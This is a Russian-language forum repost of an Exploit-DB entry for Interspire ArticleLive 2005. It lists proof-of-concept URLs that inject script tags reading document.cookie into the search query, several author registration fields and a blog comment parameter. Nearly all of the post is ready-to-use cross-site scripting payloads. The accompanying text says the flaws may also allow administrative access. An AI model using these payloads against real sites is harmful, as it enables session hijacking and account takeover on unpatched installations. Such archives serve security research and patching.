Exploit Interspire articlelive 2005 - Multiple Vulnerabilities

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
25599
Проверка EDB
  1. Пройдено
Автор
DCRAB
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2005-05-04
Код:
source: https://www.securityfocus.com/bid/13493/info

Interspire ArticleLive is reportedly prone to multiple vulnerabilities. These issues may allow a remote attacker to gain administrative access to the application and carry out various cross-site scripting attacks.

Interspire ArticleLive 2005 is reportedly affected by these issues. 

http://www.example.com/search?PHPSESSID=2a657f6c30d2c9ecd71956c2952fcd0e&Query='%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Categor
ies=0

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username='"><script>alert(document.cookie)</sc
ript>&Password=dcrab&PasswordConfirm=dcrab&FirstName=&LastName=&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e='"><script>alert(document.cookie)</script>&LastName=&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName='"><script>alert(document.cookie)</script>&Email=&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email='"><script>alert(document.cookie)</script>&Biography=dcrab&Picture=dcrab

http://www.example.com/authors/register/do?PHPSESSID=0fc0faa9965a8214874d4731c2f3e592&Username=&Password=dcrab&PasswordConfirm=dcrab&FirstNam
e=&LastName=&Email=&Biography=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&Picture=dcrab

http://www.example.com/blogs/newcomment/?BlogId='"><script>alert(document.cookie)</script>
 
Источник
www.exploit-db.com

Похожие темы